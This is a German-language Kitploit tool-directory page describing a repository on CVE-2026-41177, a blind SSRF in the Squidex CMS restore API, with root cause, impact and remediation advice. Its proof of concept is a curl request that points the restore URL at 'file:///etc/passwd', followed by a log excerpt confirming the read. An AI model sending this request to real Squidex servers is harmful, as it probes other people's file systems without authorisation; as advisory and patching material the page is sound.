Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41177-Squidex-CMS — CVE-2026-41177, eine Blind-SSRF-Schwachstelle in Squidex CMS (vor v7.23.0). Enthält Ursachenanalyse, Reproduktionsschritte und Auswirkungsbewertung hinsichtlich Local File Interaction (LFI). | Kitploit
Tools/GitHubGitHub/turkios/cve-2026-41177-squidex-cms
SchwachstellenanalyseExploitationWebsicherheitLernen & Bildung
GitHubturkios/cve-2026-41177-squidex-cms

CVE-2026-41177-Squidex-CMS

CVE-2026-41177, eine Blind-SSRF-Schwachstelle in Squidex CMS (vor v7.23.0). Enthält Ursachenanalyse, Reproduktionsschritte und Auswirkungsbewertung hinsichtlich Local File Interaction (LFI).

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41177: Squidex CMS Blind SSRF

Technische Forschung und Analyse für CVE-2026-41177: Eine Blind Server-Side Request Forgery (SSRF)-Schwachstelle in der Squidex CMS Restore-API.

Schwachstellenübersicht

  • CVE-ID: CVE-2026-41177
  • Betroffene Komponente: Squidex API: Backup / Restore-Engine (/api/apps/restore)
  • Betroffene Versionen: < 7.23.0
  • Schwachstellentyp: Blind SSRF (CWE-918), Lokale Dateiinteraktion (CWE-73)

Zusammenfassung

Die Squidex Restore-API ist anfällig für Blind Server-Side Request Forgery (SSRF). Die Anwendung validiert das URI-Schema des vom Benutzer bereitgestellten Url-Parameters nicht, wodurch die Verwendung des file://-Protokolls ermöglicht wird. Dadurch kann ein authentifizierter Administrator den Backend-Server zwingen, mit dem lokalen Dateisystem zu interagieren, was zu lokaler Dateiinteraktion (LFI) und potenzieller Offenlegung sensibler Systeminformationen durch Seitenkanalanalyse interner Protokolle führt.

Details

  1. Konfiguration: Ein Angreifer erstellt einen "Restore"-Auftrag unter Verwendung eines lokalen Dateisystem-URIs (z. B. file:///etc/passwd).
  2. Auslösung: Der Angreifer sendet die POST-Anfrage an den Restore-Endpunkt.
  3. Ausführung: Das Backend akzeptiert die Anfrage und übergibt die URL an einen Hintergrund-Worker (RestoreJob).
  4. Beobachtung: Während die API-Antwort ein generisches 204 No Content ist, zeigen die internen Serverprotokolle, dass der Server die Datei erfolgreich geöffnet und gelesen hat, bevor er fehlschlug, weil der Inhalt kein gültiges ZIP-Archiv war.

Proof of Concept (PoC)

1. Bösartige Anfrage

Führen Sie den folgenden curl-Befehl aus (ersetzen Sie <TOKEN> durch ein gültiges Admin-Token):

root@kitploit:~
curl -X POST http://localhost/api/apps/restore/ \
  -H 'Authorization: Bearer <TOKEN>' \
  -H 'Content-Type: application/json' \
  -d '{
    "Url": "file:///etc/passwd",
    "Name": "exploit-poc"
  }' -v

2. Validierung über Protokolle

Der folgende Fehler in den Squidex-Containerprotokollen bestätigt die interne Dateiinteraktion:

root@kitploit:~
{
  "logLevel": "Error",
  "message": "Backup with job id 381bcfcb-3701-44d0-a8c8-ea43b3ec6271 from URL 'file:///etc/passwd' failed.",
  "exception": {
    "type": "System.IO.InvalidDataException",
    "message": "End of Central Directory record could not be found.",
    "stackTrace": "at System.IO.Compression.ZipArchive.ReadEndOfCentralDirectory()\n at System.IO.Compression.ZipArchive..ctor(Stream stream...)\n at Squidex.Domain.Apps.Entities.Backup.BackupReader..ctor(...) in BackupReader.cs:line 42\n at Squidex.Domain.Apps.Entities.Backup.TempFolderBackupArchiveLocation.OpenReaderAsync(...) in TempFolderBackupArchiveLocation.cs:line 57"
  }
}

Hinweis: Die InvalidDataException bestätigt, dass der Server erfolgreich auf die Bytes der Datei zugegriffen und sie gelesen hat.

Auswirkungen

Diese Schwachstelle ermöglicht es authentifizierten Angreifern:

  • Dateisystem-Aufklärung: Bestätigung des Vorhandenseins sensibler Dateien (z. B. appsettings.json, Geheimnisse).
  • Informationsoffenlegung: In Multi-Tenant-Umgebungen könnte dies möglicherweise dazu verwendet werden, auf Backup-Dateien anderer Benutzer zuzugreifen.

Behebung

  • Update: Aktualisieren Sie auf Squidex-Version 7.23.0 oder höher.
  • Protokoll-Whitelisting: Erlauben Sie strikt nur http://- und https://-Schemata.
  • Eingabevalidierung: Implementieren Sie eine Prüfung, um jeden URI mit dem file://-Schema vor der Verarbeitung abzulehnen.
  • Sichere IO-Behandlung: Stellen Sie sicher, dass die zugrunde liegenden Handler für benutzerbereitgestellte Eingaben von der lokalen Dateisystemauflösung eingeschränkt sind.

Referenzen

  • GitHub Security Advisory (GHSA-45fq-w37p-qfw5)
  • Offizieller CVE-Eintrag
Tool herunterladen